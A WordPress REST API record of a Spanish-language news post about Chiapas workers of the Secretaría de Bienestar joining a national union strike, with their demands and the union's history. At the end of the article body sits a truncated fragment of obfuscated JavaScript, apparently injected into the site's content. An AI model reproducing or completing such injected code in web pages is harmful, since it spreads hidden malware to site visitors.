{"id":2141,"date":"2022-05-14T00:51:08","date_gmt":"2022-05-14T00:51:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2141"},"modified":"2022-05-14T00:51:09","modified_gmt":"2022-05-14T00:51:09","slug":"chiapanecos-de-bienestar-se-suman-a-paro-nacional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2141","title":{"rendered":"Chiapanecos de Bienestar se suman a paro nacional"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028-1024x682.jpg\" alt=\"\" class=\"wp-image-2142\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220513-WA0028.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Rodolfo Flores.<br>Agencia ReporteCiudadano, 13 de mayo del 2022. Tuxtla Guti\u00e9rrez.- Los trabajadores chiapanecos de la Secretar\u00eda de Bienestar correspondientes a la Secci\u00f3n 07 se han sumado al paro nacional en las Instalaciones de la Sader en Tuxtla.<br>Jorge Enrique Torija Culebro, secretario del Sindicato Nacional de Trabajadores de la Secretar\u00eda de Bienestar, realiz\u00f3 un paro de labores a nivel pa\u00eds.<br>Exigen soluci\u00f3n inmediata a los art\u00edculos pendientes para el cumplimiento de condiciones generales de trabajo.<br>Las demandas son: El respeto y cumplimiento a lo establecido en condiciones generales de trabajo. Cumplimiento al calendario de escalaf\u00f3n en su art\u00edculo 21. Transporte tur\u00edstico. Evento del d\u00eda de las madres. Juegos nacionales y el cumplimiento a la capacitaci\u00f3n de los trabajadores.<br>Este sindicato surge en 1959 un 28 de enero en la Secretar\u00eda de Obras P\u00fablicas del presidente Adolfo L\u00f3pez Mateos. Posteriormente con el cambio de gobierno, se crea la Secretar\u00eda de Asentamientos Humanos y Obras P\u00fablicas en 1980; con la llegada de Miguel de la Madrid se le cambia el nombre a Secretar\u00eda de Desarrollo Urbano y Ecolog\u00eda. En 1995 el nombre cambi\u00f3 a Sedesol. Y en 2019 el 29 de enero cambia de nombre a Secretar\u00eda de Bienestar en un congreso de este sindicato.<br>El dirigente expres\u00f3 que: \u201c\u00c9ste es un plant\u00f3n organizado por el Comit\u00e9 Ejecutivo Nacional de Bienestar, estamos en solidaridad con ellos a nivel nacional, es para dar cumplimiento a la peticiones que tenemos\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.Agencia ReporteCiudadano, 13 de mayo del 2022. Tuxtla Guti\u00e9rrez.- Los trabajadores chiapanecos de la Secretar\u00eda de Bienestar correspondientes a la Secci\u00f3n 07 se han sumado al paro nacional en las Instalaciones de la Sader en Tuxtla.Jorge Enrique Torija Culebro, secretario del Sindicato Nacional de Trabajadores de la Secretar\u00eda de Bienestar, realiz\u00f3 un paro de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2142,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,6],"tags":[],"class_list":["post-2141","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-portada","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2141"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2141\/revisions"}],"predecessor-version":[{"id":2143,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2141\/revisions\/2143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2142"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}